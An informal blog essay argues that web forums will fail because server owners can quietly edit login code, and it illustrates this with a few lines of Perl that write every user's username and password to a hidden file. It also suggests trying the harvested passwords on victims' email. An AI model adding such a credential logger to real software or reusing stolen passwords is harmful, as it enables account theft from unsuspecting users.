The Death to the Modern Day Blog Theory


HYPOTHESIS

My theory is that the modern day blog/webpage forums that we see everywhere will die 
due to malicious hacking.


THE HOW AND WHY?

As forums and forum type blogs become more and more popular, I honestly believe that 
the death of them will come nearer.  Right now these blog forums are a novelty.  
extremely popular and easy to use.  Pre-built forum blogs such as PHPNuke and WebAPP - 
Automated Perl Portal, are extremely simple to install, and use out of the box.

But how does this propel the blogs to its own death?  Simple.  Blogs / forums are 
everywhere now.  Most of them actually require you to log in... enter your name, 
e-mail, and password, just to view the forums and post your comments.

Which is good.  Dynamic content is amazing,a nd the information gained is even more 
so...  But you're putting your full and complete trust with both the administrator of 
the site, and even the owner of the server.  Without this trust... the blogs/forums 
would be dead.

I feel this trust will be lost.  And it's bound to happen, because it's just too easy 
to do.  Again, the novelty is there, but not for long.

Sure my password is kept in a database and is encrypted... but how hard is it for the 
site administrator, or worse.. the server owner (without the admins knowledge) to edit 
the login code ever so slightly?

EXAMPLE

Server owner somewhere in Texas (owner of my server say...) see's the forums I'm using 
and is familiar with it.

He edit's the login code by adding a few lines of Perl without my knowing:


open(FILE, ">>./path/to/file/hack.txt");
lock(FILE);
print FILE "$input{'username'}|$input{'password'}\n";
unlock(FILE);
close(FILE);


There.. That's it.  Heck.. forget the locking.. and simplify it a tad...

open(FILE, ">>./hack.txt"): print FILE "$input{'username'}|$input{'password'}\n"; 
close(FILE);

and just hide that line of code just under the login code for a day or two.  

Now you have everyone's username and password.  Go to the site, check out the 
usernames, and corresponding e-mail addresses.

I'll guarantee you that 9 out of 10 times, that will be their e-mail log in password.  
It is for mine.


CONCLUSION

The conclusion will be coming later... my lathe jsut came in!!!